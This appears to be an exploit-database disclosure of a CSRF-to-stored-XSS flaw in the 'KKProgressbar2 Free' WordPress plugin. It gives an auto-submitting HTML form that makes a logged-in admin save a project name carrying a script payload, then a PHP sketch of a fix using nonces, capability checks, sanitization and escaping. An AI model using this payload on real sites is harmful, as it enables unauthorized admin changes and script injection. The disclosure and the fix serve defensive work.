## https://sploitus.com/exploit?id=WPEX-ID:7B0046D4-CF95-4307-95A5-9B823F2DAAAA
Make a logged-in admin open an HTML file containing:
```
<body onload="document.forms[0].submit()">
<form action="http://example.com/wp-admin/admin.php?page=kkpb-menu" method="post">
<input type="hidden" name="action" value="save-project">
<input type="hidden" name="kkpb_project_name" value='"><script>alert(/XSS/)</script>'>
<input type="hidden" name="kkpb_project_link" value="csrf">
<input type="hidden" name="kkpb_project_description" value="<p>csrf</p>">
<input type="hidden" name="kkpb-auto" value="on">
<input type="hidden" name="kkpb_procent" value="0">
<input type="hidden" name="kkpb-input-name[]" value="">
<input type="hidden" name="kkpb-input-auto[]" value="">
<input type="hidden" name="kkpb-input-progress[]" value="">
<input type="hidden" name="kkpb-input-all[]" value="">
<input type="hidden" name="kkpb-input-now[]" value="">
<input type="hidden" name="kkpb-input-status[]" value="1">
</form>
</body>
```
The XSS will trigger on the "KKProgressbar2 Free" menu.
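
The form above succeeds because the save request carries no anti-CSRF token and the stored project name is later printed without escaping. The sketch below is an added example of a hardened save path using standard WordPress APIs; it is not the plugin's own code. Assumptions: the `example_kkpb_*` function names, the nonce action and field names, the `manage_options` capability, and the attribute output context (inferred from the `">` breakout in the payload). Field names are taken from the PoC form.

```php
<?php
// Added example, not the plugin's code. example_kkpb_* names are hypothetical.

// 1. Form markup: emit a nonce bound to the current user and this action.
function example_kkpb_render_form_nonce() {
    wp_nonce_field( 'kkpb_save_project', 'kkpb_nonce' );
}

// 2. Save handler: refuse the request unless capability and nonce both check out.
function example_kkpb_save_project() {
    if ( ! isset( $_POST['action'] ) || 'save-project' !== $_POST['action'] ) {
        return null; // Not a save request.
    }
    if ( ! current_user_can( 'manage_options' ) ) { // Assumed capability.
        wp_die( 'Forbidden', '', array( 'response' => 403 ) );
    }
    // Terminates the request when kkpb_nonce is missing or invalid, which is
    // the case for a form auto-submitted from an attacker-controlled page.
    check_admin_referer( 'kkpb_save_project', 'kkpb_nonce' );

    $post = wp_unslash( $_POST );

    // Sanitize each field for its type before it is stored.
    return array(
        'name'        => sanitize_text_field( $post['kkpb_project_name'] ?? '' ),
        'link'        => esc_url_raw( $post['kkpb_project_link'] ?? '' ),
        'description' => wp_kses_post( $post['kkpb_project_description'] ?? '' ),
        'percent'     => absint( $post['kkpb_procent'] ?? 0 ),
    );
}

// 3. Output: escape for the context, even though input was sanitized,
//    so values already stored in the database cannot break out of the attribute.
function example_kkpb_render_name_input( $name ) {
    printf(
        '<input type="text" name="kkpb_project_name" value="%s">',
        esc_attr( $name )
    );
}
```

The nonce check stops the cross-site submission; the output escaping is what neutralizes a payload that is already stored.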